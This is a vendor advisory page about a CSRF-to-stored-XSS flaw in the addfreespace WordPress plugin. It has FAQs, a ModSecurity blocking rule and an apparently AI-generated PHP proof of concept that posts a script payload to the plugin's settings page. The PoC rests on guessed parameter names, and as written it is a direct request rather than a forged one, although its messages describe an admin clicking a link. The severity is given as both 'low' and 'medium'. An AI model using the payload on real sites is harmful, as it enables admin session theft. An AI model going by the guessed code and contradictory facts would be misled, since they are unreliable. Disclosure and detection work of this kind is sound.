What is CVE-2026-6701?

CVE-2026-6701 is a Cross-Site Request Forgery (CSRF) vulnerability affecting the addfreespace plugin for WordPress, specifically versions up to and including 0.1.3. This vulnerability allows unauthenticated attackers to inject malicious scripts into the plugin’s settings by tricking an administrator into performing a specific action.

How does this vulnerability work?

The vulnerability arises from the lack of nonce validation in the settings-update function of the addfreespace plugin. An attacker can send a forged request containing malicious payloads, which, when executed by an administrator, can lead to stored Cross-Site Scripting (XSS) in the WordPress admin dashboard.

Who is affected by this vulnerability?

Any WordPress site using the addfreespace plugin version 0.1.3 or earlier is affected by this vulnerability. Administrators should check their installed plugins to determine if they are using the vulnerable version.

How can I check if I am using a vulnerable version?

You can check the version of the addfreespace plugin by navigating to the ‘Plugins’ section in your WordPress admin panel. Look for the version number next to the addfreespace plugin entry to see if it is 0.1.3 or earlier.

What is the recommended mitigation for this vulnerability?

The best course of action is to remove the addfreespace plugin entirely, as there is no patch currently available from the developer. If removal is not possible, ensure that no administrator clicks on untrusted links that could trigger the CSRF attack.

What does the CVSS score of 4.3 indicate?

A CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability requires social engineering to exploit, it still poses a risk. Administrators should be aware of the potential for exploitation through user interaction.

What is Cross-Site Request Forgery (CSRF)?

CSRF is an attack that tricks a user into executing unwanted actions on a web application in which they are authenticated. This can lead to unauthorized changes or actions being performed without the user’s consent.

How does stored Cross-Site Scripting (XSS) occur in this case?

Stored XSS occurs when an attacker injects malicious scripts into a web application, which are then stored in the database and executed when an administrator accesses the affected page. In this case, the unsanitized settings value allows the script to run in the admin dashboard.

What is a nonce and why is it important?

A nonce is a security token used in WordPress to verify that a request comes from a legitimate source. It helps prevent CSRF attacks by ensuring that only authorized users can perform certain actions. The absence of nonce validation in this vulnerability is a critical security flaw.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can craft a malicious POST request to the vulnerable settings page without nonce verification. It shows how the attacker can inject a JavaScript payload that is stored and executed later, demonstrating the practical implications of the vulnerability.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 5, 2026

CVE-2026-6701: addfreespace <= 0.1.3 – Cross-Site Request Forgery to Stored Cross-Site Scripting via Settings Page (addfreespace)

CVE ID CVE-2026-6701

Plugin addfreespace

Severity Medium (CVSS 4.3)

CWE 352

Vulnerable Version 0.1.3

Patched Version —

Disclosed May 3, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6701 (metadata-based):

This vulnerability affects the addfreespace WordPress plugin, versions 0.1.3 and earlier, and is a Cross-Site Request Forgery (CSRF) issue that leads to Stored Cross-Site Scripting (XSS) via the plugin’s settings page. The CVSS score is 4.3 (low), reflecting the requirement for social engineering (tricking a site administrator) to trigger the attack. Atomic Edge research identifies the vulnerable component as a settings-saving function that lacks proper nonce verification.

Root Cause: The CWE-352 classification and description indicate the plugin’s settings-update function does not include or validate a nonce (number used once) token. In WordPress, any admin-facing form or AJAX handler must check a nonce to verify the request originated from the intended admin user, preventing forged requests. Without this check, an attacker can craft a malicious link that, when clicked by an authenticated administrator, executes unintended actions. The subsequent stored XSS occurs because the plugin fails to sanitize or escape the settings values before storing them in the database. These conclusions are inferred from the CWE and description; no code diff is available for confirmation.

Exploitation: An attacker sends a forged HTTP request (e.g., a POST to the WordPress admin settings page for the plugin) containing malicious JavaScript payloads in parameter fields such as ‘addfreespace_option’. The request is sent to a URL like /wp-admin/options-general.php?page=addfreespace-settings (or a custom admin page). Because the nonce is missing, the server processes the request. The payload is saved to the plugin’s settings (e.g., ‘addfreespace_options’ in the wp_options table). When an administrator later visits the settings page, the unsanitized payload executes as stored XSS. The attack requires tricking an admin into clicking a link (via email, social media, etc.) that triggers the CSRF.

Remediation: The fix must add nonce verification to the settings-saving function. In WordPress, this involves calling wp_verify_nonce() against a nonce field rendered using wp_nonce_field() in the form. Additionally, the plugin must sanitize all settings inputs using functions like sanitize_text_field() or wp_kses(), and escape output using esc_html() or esc_attr() when rendering stored values. Since no patch is available from the developer, users should remove the plugin entirely.

Impact: Successful exploitation allows an attacker to inject arbitrary JavaScript into the WordPress admin dashboard. This can lead to session hijacking, admin credential theft, and further compromise of the WordPress installation via XSS-based privilege escalation. The attacker can also modify plugin settings to cause defacement or redirect site visitors. The need for admin interaction reduces the severity but does not eliminate the risk.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-6701 (metadata-based)
# Blocks CSRF to Stored XSS via settings page (form submission without nonce)
SecRule REQUEST_URI "@contains /wp-admin/options-general.php" 
    "id:20266701,phase:2,deny,status:403,chain,msg:'CVE-2026-6701 via addfreespace settings CSRF -> XSS',severity:'CRITICAL',tag:'CVE-2026-6701'"
    SecRule ARGS_GET:page "@streq addfreespace-settings" "chain"
        SecRule ARGS_POST:@rx ".*" "chain"
            SecRule REQUEST_METHOD "@streq POST" 
                "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6701 - addfreespace <= 0.1.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting via Settings Page

<?php
/**
 * This PoC demonstrates a CSRF attack that stores XSS payload in plugin settings.
 * Assumptions:
 * - The plugin registers a settings page under a static slug (e.g., 'addfreespace-settings') accessible via /wp-admin/options-general.php?page=addfreespace-settings
 * - The settings are saved via a POST request to the same URL without nonce verification
 * - The vulnerable parameter is 'addfreespace_option' (example field)
 * 
 * Execute from command line: php cve_2026_6701_poc.php
 */

// Configure target WordPress site
$target_url = 'http://example.com/wp-admin/options-general.php?page=addfreespace-settings';

// Malicious XSS payload to inject into settings
$xss_payload = '<script>alert("XSS by Atomic Edge");</script>';

// Craft the forged POST request (no nonce)
$post_data = array(
    'addfreespace_option' => $xss_payload,
    'submit' => 'Save Settings'
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_test_cookie=WP+Cookie+check'); // arbitrary
$response = curl_exec($ch);

if (curl_error($ch)) {
    echo 'cURL error: ' . curl_error($ch) . "n";
} else {
    echo "[+] CSRF payload sent successfully.n";
    echo "[+] If an admin clicks the link, the XSS will be stored.n";
    echo "[+] Payload: $xss_payloadn";
}

$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "[+] HTTP response code: $http_coden";

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-6701?
Understanding the vulnerability
CVE-2026-6701 is a Cross-Site Request Forgery (CSRF) vulnerability affecting the addfreespace plugin for WordPress, specifically versions up to and including 0.1.3. This vulnerability allows unauthenticated attackers to inject malicious scripts into the plugin’s settings by tricking an administrator into performing a specific action.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the lack of nonce validation in the settings-update function of the addfreespace plugin. An attacker can send a forged request containing malicious payloads, which, when executed by an administrator, can lead to stored Cross-Site Scripting (XSS) in the WordPress admin dashboard.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the addfreespace plugin version 0.1.3 or earlier is affected by this vulnerability. Administrators should check their installed plugins to determine if they are using the vulnerable version.
How can I check if I am using a vulnerable version?
Verifying plugin versions
You can check the version of the addfreespace plugin by navigating to the ‘Plugins’ section in your WordPress admin panel. Look for the version number next to the addfreespace plugin entry to see if it is 0.1.3 or earlier.
What is the recommended mitigation for this vulnerability?
Steps to secure your site
The best course of action is to remove the addfreespace plugin entirely, as there is no patch currently available from the developer. If removal is not possible, ensure that no administrator clicks on untrusted links that could trigger the CSRF attack.
What does the CVSS score of 4.3 indicate?
Understanding risk levels
A CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability requires social engineering to exploit, it still poses a risk. Administrators should be aware of the potential for exploitation through user interaction.
What is Cross-Site Request Forgery (CSRF)?
Defining CSRF
CSRF is an attack that tricks a user into executing unwanted actions on a web application in which they are authenticated. This can lead to unauthorized changes or actions being performed without the user’s consent.
How does stored Cross-Site Scripting (XSS) occur in this case?
Explaining the XSS aspect
Stored XSS occurs when an attacker injects malicious scripts into a web application, which are then stored in the database and executed when an administrator accesses the affected page. In this case, the unsanitized settings value allows the script to run in the admin dashboard.
What is a nonce and why is it important?
Role of nonces in WordPress security
A nonce is a security token used in WordPress to verify that a request comes from a legitimate source. It helps prevent CSRF attacks by ensuring that only authorized users can perform certain actions. The absence of nonce validation in this vulnerability is a critical security flaw.
What does the proof of concept demonstrate?
Understanding the PoC
The proof of concept illustrates how an attacker can craft a malicious POST request to the vulnerable settings page without nonce verification. It shows how the attacker can inject a JavaScript payload that is stored and executed later, demonstrating the practical implications of the vulnerability.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations